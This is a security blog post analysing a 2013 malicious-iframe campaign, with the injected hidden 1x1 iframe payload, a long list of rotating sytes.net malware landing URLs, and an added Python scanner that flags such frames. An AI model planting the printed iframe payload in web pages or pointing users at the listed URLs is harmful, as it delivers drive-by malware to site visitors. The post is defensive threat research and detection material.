Sucuri Blog

Website Security News

Malware iFrame Campaign from Sytes(.)net

October 3, 2013, by Daniel Cid


For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that injects iframes into compromised sites, each pointing at a randomly named subdomain of sytes(.)net (a free dynamic DNS domain from No-IP, the same provider behind no-ip.org).

Malicious iframe injection is nothing new; attackers have been abusing no-ip.org domains for a long time. What catches our attention here is how often the hostnames change and how short their lifespan is.

This is the payload being added to the compromised sites:

<iframe src="httX:// krbnomrhp.sytes.net:12601 /cart/manuallogin/linktous.php?guardian=82" 
    width=1 height=1 style="visibility: hidden"></iframe>

As you can see, it is a normal iframe injection: a 1x1, hidden frame that loads a PHP page from a random sytes.net hostname on a non-standard port (9101 or 12601 in everything listed below), always with a numeric parameter of 82. But that hostname goes offline after roughly 30 minutes and is replaced by a new one. Here is the list we compiled over the past 24 hours. The number at the start of each line is how many times we saw that URL, and the trailing quote is the closing quote of the src attribute the URL was extracted from (the one w3.org DTD entry is an artifact of the extraction, not part of the campaign):

     40 http://snbkjmv.sytes.net:9101/htbin/clickheat/virus.php?spamnav=82"
     35 http://rvpyhfkjrf.sytes.net:9101/url/uploads/virus.php?spamnav=82"
     34 http://yhmpzoav.sytes.net:9101/mchat/descs/temp_order/punknown.php?power=82"
     30 http://yerepkhayq.sytes.net:9101/vmailadmin/proxy/wp-admin/virus.php?spamnav=82"
     30 http://knkkmprda.sytes.net:9101/dbadmin/virus.php?spamnav=82"
     28 http://nmmmdbhh.sytes.net:12601/mysql/gentoo.php?deals=82"
     27 http://sumghmrs.sytes.net:9101/classes/temp_order/components/virus.php?spamnav=82"
     27 http://lvvfafoylf.sytes.net:9101/srv/virus.php?spamnav=82"
     26 http://rvpyhfkjrf.sytes.net:9101/t/virus.php?spamnav=82"
     26 http://ndcdkba.sytes.net:9101/ip/search/stonemanor/punknown.php?power=82"
     24 http://sgkiipjali.sytes.net:12601/archive/administr8/admin4_colon/gentoo.php?deals=82"
     24 http://nmmmdbhh.sytes.net:12601/phpldapadmin/phpsysinfo/photos/gentoo.php?deals=82"
     24 http://mpuizserdk.sytes.net:9101/skins/virus.php?spamnav=82"
     23 http://zzaisucp.sytes.net:9101/cadmins/adm/options/virus.php?spamnav=82"
     23 http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"
     23 http://vzfxlctk.sytes.net:9101/bitmaps/competition/download/virus.php?spamnav=82"
     23 http://hmbgmijz.sytes.net:9101/video/cgi-perl/tag/outdoors.php?cert=82"
     22 http://xpvcrpf.sytes.net:9101/log_order/punknown.php?power=82"
     22 http://xivzwmojg.sytes.net:9101/admin_includes/config/public/virus.php?spamnav=82"
     22 http://sgkiipjali.sytes.net:12601/roman/gentoo.php?deals=82"
     22 http://knkkmprda.sytes.net:9101/command/virus.php?spamnav=82"
     22 http://kahfcjkg.sytes.net:12601/project/event.php?technical=82"
     22 http://iuxvbhxrp.sytes.net:9101/logo_sysadmin/dev/buy/punknown.php?powe
     22 http://hjzdenbi.sytes.net:9101/cpanel_file/film.php?photos=82"
     21 http://sumghmrs.sytes.net:9101/c0de/virus.php?spamnav=82"
     21 http://irpuxtox.sytes.net:9101/class/bitmaps/virus.php?spamnav=82"
     20 http://vtummjhpb.sytes.net:9101/source/outdoors.php?cert=82"
     20 http://ntygkznp.sytes.net:9101/examples/system-administration/admin_files/outdoors.php?cert=82"
     20 http://nswdmekq.sytes.net:9101/full/sec/virus.php?spamnav=82"
     20 http://ngoydafv.sytes.net:12601/picture_library/htm/gentoo.php?deals=82"
     20 http://mnzzgocsjh.sytes.net:9101/tmp/engine/virus.php?spamnav=82"
     20 http://mnwpkrqbu.sytes.net:12601/admin4_colon/gentoo.php?deals=82"
     20 http://lzrbccmyh.sytes.net:9101/support/outdoors.php?cert=82"
     20 http://knkkmprda.sytes.net:9101/administrators/options/virus.php?spamnav=82"
     20 http://idbosrxgg.sytes.net:9101/session/virus.php?spamnav=82"
     20 http://fgsbmtad.sytes.net:9101/2007/daily/virus.php?spamnav=82"
     20 http://eljbpjfwg.sytes.net:9101/advanced/punknown.php?power=82"
     20 http://dphtmdd.sytes.net:9101/feed/javascript/sql/virus.php?spamnav=82"
     19 http://vxvyvrf.sytes.net:9101/mysql/film.php?photos=82"
     19 http://ukmwzaum.sytes.net:9101/report/tmp/imode/virus.php?spamnav=82"
     19 http://ngoydafv.sytes.net:12601/titles/Lotus_Domino_Admin/maps/gentoo.php?deals=82"
     19 http://fiwailsko.sytes.net:9101/sshadmin/punknown.php?power=82"
     19 http://fgsbmtad.sytes.net:9101/daemon/virus.php?spamnav=82"
     18 http://zwwskaudp.sytes.net:9101/sshadmin/admin1/post/virus.php?spamnav=82"
     18 http://xlsymepe.sytes.net:9101/2003/punknown.php?power=82"
     18 http://ngoydafv.sytes.net:12601/wp-content/nwshp/conf/gentoo.php?deals=82"
     18 http://iljdfdiap.sytes.net:9101/bad/virus.php?spamnav=82"
     18 http://etaggovaql.sytes.net:9101/am/2006/special/punknown.php?power=82"
     18 http://bxluzpbq.sytes.net:9101/profile/wm/feedback/film.php?photos=82"
     17 http://yerepkhayq.sytes.net:9101/finance/virus.php?spamnav=82"
     17 http://vzfxlctk.sytes.net:9101/cpanel_file/zip/virus.php?spamnav=82"
     17 http://ukmwzaum.sytes.net:9101/adm2/virus.php?spamnav=82"
     17 http://mmqozpxrm.sytes.net:9101/haddan_files/punknown.php?power=82"
     17 http://kyicikarpu.sytes.net:9101/results/pm/screens/virus.php?spamnav=82"
     17 http://knhvdmsi.sytes.net:9101/pm/punknown.php?power=82"
     17 http://fowkvsqt.sytes.net:9101/money/admin/virus.php?spamnav=82"
     17 http://fkzsjei.sytes.net:9101/add/virus.php?spamnav=82"
     16 http://zwpcoxs.sytes.net:9101/server_admin_small/elements/film.php?photos=82"
     16 http://vzfxlctk.sytes.net:9101/useradmin/virus.php?spamnav=82"
     16 http://snbkjmv.sytes.net:9101/bbadmin/alterra/virus.php?spamnav=82"
     16 http://ovdqypgi.sytes.net:12601/relax/gentoo.php?deals=82"
     16 http://ovdqypgi.sytes.net:12601/2010/gentoo.php?deals=82"
     15 http://qrzugjjrw.sytes.net:9101/oplata/order/virus.php?spamnav=82"
     15 http://ozqsveikb.sytes.net:9101/avi/virus.php?spamnav=82"
     15 http://nnlwlvq.sytes.net:9101/article/downloads/include/virus.php?spamnav=82"
     15 http://knkkmprda.sytes.net:9101/banneradmin/virus.php?spamnav=82"
     15 http://enwebkwh.sytes.net:9101/product/virus.php?spamnav=82"
     15 http://coqptizgt.sytes.net:9101/data/outdoors.php?cert=82"
     15 http://axfhttqnl.sytes.net:9101/node/virus.php?spamnav=82"
     14 http://xglpjtlpbl.sytes.net:9101/help/outdoors.php?cert=82"
     14 http://xdxmziges.sytes.net:9101/tools/xyza/outdoors.php?cert=82"
     14 http://wwcrkkiu.sytes.net:9101/sshadmin/down/outdoors.php?cert=82"
     14 http://pkpmezztj.sytes.net:9101/beta/sbot/film.php?photos=82"
     14 http://owtppqzjh.sytes.net:9101/internal/proxy/autologin/film.php?photos=82"
     14 http://oggnxbyjwi.sytes.net:9101/backup/e107_handlers/partner/film.php?photos=82"
     14 http://oexwfsnp.sytes.net:9101/php/xfile/directadmin/virus.php?spamnav=82"
     14 http://oexwfsnp.sytes.net:9101/language/ccp14admin/style/virus.php?spamnav=82"
     14 http://nifhevj.sytes.net:9101/cache/sshadmin/inc/outdoors.php?cert=82"
     14 http://mpuizserdk.sytes.net:9101/page/author/misc/virus.php?spamnav=82"
     14 http://mkqydbik.sytes.net:9101/pass/outdoors.php?cert=82"
     14 http://lkgzbafam.sytes.net:9101/installation/outdoors.php?cert=82"
     14 http://lhruanxu.sytes.net:9101/software/virus.php?spamnav=82"
     14 http://kzaefdyx.sytes.net:9101/system/pic/nwshp/punknown.php?power=82"
     14 http://kzaefdyx.sytes.net:9101/admin4_account/punknown.php?power=82"
     14 http://kyicikarpu.sytes.net:9101/commercial/virus.php?spamnav=82"
     14 http://kdkudocdcj.sytes.net:9101/data/content/toolz/punknown.php?power=82"
     14 http://hjzdenbi.sytes.net:9101/ip/extras/null/film.php?photos=82"
     14 http://fiwailsko.sytes.net:9101/mysql_admin/punknown.php?power=82"
     14 http://cdjbdwcnb.sytes.net:9101/sysadmin/money/counters/virus.php?spamnav=82"
     14 http://augtohpklj.sytes.net:9101/plugins/user/house/virus.php?spamnav=82"
     14 http://anxytxwf.sytes.net:9101/addnews/punknown.php?power=82"
     13 http://zrsbhxi.sytes.net:9101/titles/cpanel/themes/virus.php?spamnav=82"
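
Added example (this is not code from the post or from Sucuri): a small Python scanner that looks for the traits of this campaign in saved page content rather than for specific hostnames, since the hostnames rotate every half hour. It checks each iframe for a hidden or 1x1 frame, a dynamic DNS hostname under sytes.net or no-ip.org, and a non-standard port, flags frames that show at least two of those traits, and aggregates hits per URL the same way the count list above was built. The sample pages are constructed for the example (the two injected URLs in them are taken from the list above); the DYNDNS_SUFFIXES tuple and the two-trait threshold are assumptions to tune for your own environment.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Dynamic DNS parents named on this page: sytes.net (this campaign) and
# no-ip.org (earlier ones). Assumption for this example; extend as needed.
DYNDNS_SUFFIXES = (".sytes.net", ".no-ip.org")

# Injected tags are machine-generated and regular, so a deliberately simple
# tag/attribute regex is enough here; a full HTML parser is not required.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(attr_text):
    """Return {name: value} for quoted and unquoted attributes (width=1 height=1 ...)."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        name, dq, sq, bare = m.groups()
        attrs[name.lower()] = dq if dq is not None else sq if sq is not None else bare
    return attrs


def is_hidden(attrs):
    """1x1 (or 0x0) frames and visibility/display tricks are how the injection stays unseen."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
    return tiny or "visibility:hidden" in style or "display:none" in style


def suspicious_reasons(attrs):
    """List the campaign traits an iframe shows; callers treat two or more as a hit."""
    reasons = []
    src = attrs.get("src", "")
    try:
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return ["unparseable src"]
    if not host:
        return []
    if host.endswith(DYNDNS_SUFFIXES):
        reasons.append("dynamic DNS host")
    if port not in (None, 80, 443):
        reasons.append("non-standard port %d" % port)
    if is_hidden(attrs):
        reasons.append("hidden frame")
    return reasons


def find_injected_iframes(html, min_reasons=2):
    """Return [(src, reasons)] for every iframe in the page that looks injected."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        if "src" not in attrs:
            continue
        reasons = suspicious_reasons(attrs)
        if len(reasons) >= min_reasons:
            hits.append((attrs["src"], reasons))
    return hits


def count_by_url(pages):
    """Aggregate hits across many pages, like `sort | uniq -c | sort -rn` on the list above."""
    counter = Counter()
    for html in pages:
        for src, _ in find_injected_iframes(html):
            counter[src] += 1
    return counter.most_common()


# Constructed sample pages (not real captures). The first three carry the
# injection using URLs from the list in the post; the last two are controls.
SAMPLE_PAGES = [
    '<html><body><h1>Shop</h1><iframe src="http://snbkjmv.sytes.net:9101/htbin/clickheat/virus.php?spamnav=82" '
    'width=1 height=1 style="visibility: hidden"></iframe></body></html>',
    '<p>news</p><IFRAME SRC="http://snbkjmv.sytes.net:9101/htbin/clickheat/virus.php?spamnav=82" '
    'width="1" height="1"></IFRAME>',
    # visible frame, but dynamic DNS host plus non-standard port: still two traits, still a hit
    '<iframe src="http://nmmmdbhh.sytes.net:12601/mysql/gentoo.php?deals=82" width="300" height="200"></iframe>',
    # ordinary embedded video: no traits
    '<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>',
    # hidden, but normal host and port: one trait only, not flagged at the default threshold
    '<iframe src="http://example.com/pixel.php" width=1 height=1 style="display:none"></iframe>',
]

if __name__ == "__main__":
    for url, count in count_by_url(SAMPLE_PAGES):
        print("%7d %s" % (count, url))
```

Feed it the contents of PHP, HTML and template files pulled from the document root, or saved HTTP responses; only the text reaching the regex matters. Lowering min_reasons to 1 turns it into a sweep for every hidden frame, at the cost of also flagging legitimate tracking pixels, which is why the default asks for two traits.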
How are the sites getting compromised?

This is a question we get often, but unfortunately we don't have access to all the sites we monitor or can query externally, so we can't pinpoint the exact source of the initial compromise.

However, we do know that most of the affected sites are running outdated versions of Joomla or WordPress, so unpatched CMS installs are the likely entry point, even if we cannot name the specific vulnerability.

Also remember that, while we can't say exactly how it is happening, sites behind our CloudProxy product have not experienced any issues, as it blocks this class of attack.


Categories: Website Malware Infections. Tags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Comments

  1. Jugar Jugar

    October 4, 2013

    For a website it is essential to build a good firewall, and security information is inevitable. Recently, malware has invaded from your web server to the user; this really makes us confused and worried about the safety of our laptop and another line

  2. Para Friv

    October 5, 2013

    I still do not understand this content, but thank you very much for sharing the information.

  3. Kjetil

    October 9, 2013

    These are all landing pages related to Sweet Orange exploit kit.

  4. pyby

    October 9, 2013

    Nasty malware, I'm working on it. It uses EXIF in JPEGs to execute malware!

    Check my blog: http://www.vsx.pl/malware-php-iframe-powiazany-z-sytes-net-cookie-dsgfdg34g-htaccess-zmieniony/

  5. vtedesco

    November 4, 2013

    If that can help you : I have found the malware code in a joomla website in the file “/libraries/joomla/factory.php” (line 15)
